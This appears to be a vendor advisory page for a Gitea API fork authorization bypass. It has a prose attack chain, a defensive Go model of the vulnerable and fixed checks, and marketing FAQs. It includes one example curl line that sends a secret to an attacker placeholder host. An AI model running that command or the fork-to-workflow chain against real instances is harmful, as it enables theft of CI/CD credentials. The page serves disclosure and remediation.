8.1
High
code.gitea.io/gitea

CVE-2026-22555

CVE-2026-22555 is a high-severity incorrect authorization vulnerability in code.gitea.io/gitea (go), affecting versions < 1.26.0. It is fixed in 1.26.0.

Key facts

  • CVSS score: 8.1 (High)
  • Attack vector: Network
  • Issuing authority: GitHub Advisory Database
  • Affected package: code.gitea.io/gitea
  • Fixed in: 1.26.0
  • Disclosed: 2026

Summary

The API endpoint POST /api/v1/repos/{owner}/{repo}/forks only checks IsOrgMember() when a user forks a repository into an organization, but does not check CanCreateOrgRepo(). The web UI fork handler correctly checks both. This allows a read-only organization member, in a team with cancreateorgrepo=false, to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure.

Steps To Reproduce

Environment setup

  • Start a Gitea instance with Actions enabled:
  • Create the target environment (as admin)
  • Register an Actions runner
  • Verify attacker CANNOT create repos in the org (expected: 403)

Exploit: Fork into the org via API (THE BYPASS)

The attacker now has admin+push access to an org-owned repository, despite being in a team with cancreateorgrepo=false.

Enable Actions and push exfiltration workflow

Verify secret exfiltration

Expected output in the workflow logs: All three organization-level secrets are accessible to the attacker's workflow. In a real attack, the workflow would exfiltrate secrets to an attacker-controlled endpoint (e.g., curl -d "$SECRET" https://attacker.example.com/collect).

Impact

A read-only organization member, with no repository creation rights (cancreateorgrepo=false), can exfiltrate all organization-level CI/CD secrets by exploiting a missing authorization check in the API fork endpoint. The web UI correctly enforces the CanCreateOrgRepo permission, but the API does not, creating a classic API-vs-web authorization inconsistency.
The attack chain is: (1) fork an existing org repo back into the same org via the API, bypassing the CanCreateOrgRepo check; (2) receive admin permissions on the fork as its creator; (3) enable Actions and push a workflow that references org secrets; (4) the org's runner picks up the job (runners match on repository.ownerid), and org secrets are injected into the workflow environment (fetched by Repo.OwnerID); (5) the workflow exfiltrates all org secrets.

Organization secrets commonly include deploy keys, cloud credentials (AWS IAM keys, GCP service accounts), container registry tokens, and personal access tokens with broad scope. Stolen credentials enable lateral movement to cloud infrastructure, private repositories, and external services far beyond the Gitea instance itself. The attacker can also push arbitrary code under the organization's trusted namespace, creating supply chain risk for downstream consumers.

This is particularly dangerous because organizations commonly use read-only teams for auditors, reviewers, contractors, or new employees, precisely the users who should NOT have access to production secrets.
Supporting Material/References

  • poc-fork-authz-bypass.zip, ZIP archive containing the full exploit script and README
  • Vulnerable code, API fork handler (missing CanCreateOrgRepo check): https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/api/v1/repo/fork.go#L135-L144
  • Correct code, Web fork handler (has CanCreateOrgRepo check): https://github.com/go-gitea/gitea/blob/79f96b3e24/routers/web/repo/fork.go#L181-L189
  • Runner task assignment (matches on owner_id): https://github.com/go-gitea/gitea/blob/79f96b3e24/models/actions/task.go#L245-L248
  • Secret injection (fetches by Repo.OwnerID): https://github.com/go-gitea/gitea/blob/79f96b3e24/models/secret/secret.go#L167
  • Fork creator gets admin permissions: https://github.com/go-gitea/gitea/blob/79f96b3e24/services/repository/create.go#L433-L440
  • Related fix: PR #34031 fixed a similar bypass via repo transfers, confirming this class of authorization inconsistency is treated as a vulnerability
  • OWASP API Security Top 10 2023: API5, Broken Function Level Authorization
  • OWASP Top 10 2021: A01, Broken Access Control
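To make the missing check concrete, the following Go program is an added example (not Gitea's code, and not from the advisory or its proof of concept) that models the two authorization decisions the advisory contrasts: the API fork path that only checks organization membership, and the web path that also checks whether the member's team grants repository creation. It also models step (4) of the attack chain, where secret injection is keyed on the repository's owner rather than on the creator's rights, which is why a fork that lands in the org namespace sees org secrets. The types, method names and error values (Org, Team, Repo, IsOrgMember, CanCreateOrgRepo, OwnerID, ErrNotMember, ErrCannotCreate) are assumptions chosen to mirror the advisory's wording, and the member and secret names are constructed sample data.

```go
package main

import (
	"errors"
	"fmt"
)

// Sentinel errors standing in for the HTTP 403 responses the advisory expects
// (assumed names; not Gitea's).
var (
	ErrNotMember    = errors.New("forbidden: not an organization member")
	ErrCannotCreate = errors.New("forbidden: team does not grant repository creation")
)

// Team carries the per-team repository-creation flag (assumed name).
type Team struct {
	Name             string
	CanCreateOrgRepo bool
}

// Org has an ID (what secrets are scoped by) and each member's teams.
type Org struct {
	ID      int64
	Members map[string][]Team // username -> teams within this org
}

// IsOrgMember is the only check the vulnerable API path performs.
func (o Org) IsOrgMember(user string) bool {
	_, ok := o.Members[user]
	return ok
}

// CanCreateOrgRepo is true if any of the user's teams grants repo creation.
func (o Org) CanCreateOrgRepo(user string) bool {
	for _, t := range o.Members[user] {
		if t.CanCreateOrgRepo {
			return true
		}
	}
	return false
}

// Repo records its owner; OwnerID is the key secret injection uses.
type Repo struct {
	Name    string
	OwnerID int64
	Admins  []string
}

// newFork places the fork under the org and grants its creator admin.
func newFork(o Org, creator, name string) *Repo {
	return &Repo{Name: name, OwnerID: o.ID, Admins: []string{creator}}
}

// forkIntoOrgVulnerable mirrors the API handler as described: membership only.
func forkIntoOrgVulnerable(o Org, user, name string) (*Repo, error) {
	if !o.IsOrgMember(user) {
		return nil, ErrNotMember
	}
	return newFork(o, user, name), nil
}

// forkIntoOrgFixed mirrors the web handler: membership and creation right.
func forkIntoOrgFixed(o Org, user, name string) (*Repo, error) {
	if !o.IsOrgMember(user) {
		return nil, ErrNotMember
	}
	if !o.CanCreateOrgRepo(user) {
		return nil, ErrCannotCreate
	}
	return newFork(o, user, name), nil
}

// secretsForRepo models injection keyed on the repository's owner: every repo
// owned by the org sees the org's secrets, whoever created it.
func secretsForRepo(orgSecrets map[int64][]string, r *Repo) []string {
	return orgSecrets[r.OwnerID]
}

func main() {
	// Constructed sample org: one read-only team member, one member whose team may create repos.
	org := Org{ID: 42, Members: map[string][]Team{
		"auditor":    {{Name: "readonly", CanCreateOrgRepo: false}},
		"maintainer": {{Name: "owners", CanCreateOrgRepo: true}},
	}}
	// Constructed sample secret names; only the names matter here.
	secrets := map[int64][]string{42: {"DEPLOY_KEY", "CLOUD_CREDENTIALS", "REGISTRY_TOKEN"}}

	for _, user := range []string{"auditor", "maintainer", "outsider"} {
		fork, verr := forkIntoOrgVulnerable(org, user, "app-fork")
		_, ferr := forkIntoOrgFixed(org, user, "app-fork")
		fmt.Printf("%-10s API path (vulnerable): %v\n", user, verr)
		fmt.Printf("%-10s web path (fixed):      %v\n", user, ferr)
		if fork != nil {
			fmt.Printf("%-10s fork owner=%d sees org secrets %v\n", user, fork.OwnerID, secretsForRepo(secrets, fork))
		}
	}
}
```

Running it shows the read-only member accepted by the vulnerable path and rejected with ErrCannotCreate by the fixed path, while the fork the vulnerable path created resolves to the org's secrets purely through OwnerID. The point for reviewers is that the secret and runner layers trust repository ownership, so every route that can place a repository under an organization (create, fork, transfer) has to apply the same creation check as its web counterpart; a missing check in any one of them is the whole bypass.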

Impact

What is incorrect authorization?

The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.

Severity and exposure

CVE-2026-22555 has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.

A fixed version is available (1.26.0). Upgrading removes the vulnerable code path.

Affected versions

go

  • code.gitea.io/gitea (< 1.26.0)

Security releases

  • code.gitea.io/gitea → 1.26.0 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.

Kodem's runtime-powered SCA identifies whether CVE-2026-22555 is reachable in your applications. Explore open-source security for your team.


Remediation advice

Upgrade code.gitea.io/gitea to 1.26.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently asked questions about CVE-2026-22555

What is CVE-2026-22555?

CVE-2026-22555 is a high-severity incorrect authorization vulnerability in code.gitea.io/gitea (go), affecting versions < 1.26.0. It is fixed in 1.26.0. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.

How severe is CVE-2026-22555?

CVE-2026-22555 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.

Which versions of code.gitea.io/gitea are affected by CVE-2026-22555?

code.gitea.io/gitea (go) versions < 1.26.0 are affected.

Is there a fix for CVE-2026-22555?

Yes. CVE-2026-22555 is fixed in 1.26.0. Upgrade to this version or later.

Is CVE-2026-22555 exploitable, and should I be worried?

Whether CVE-2026-22555 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.

What actually determines whether CVE-2026-22555 is exploitable, and how bad it is?

Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.

How do I fix CVE-2026-22555?

Upgrade code.gitea.io/gitea to 1.26.0 or later.
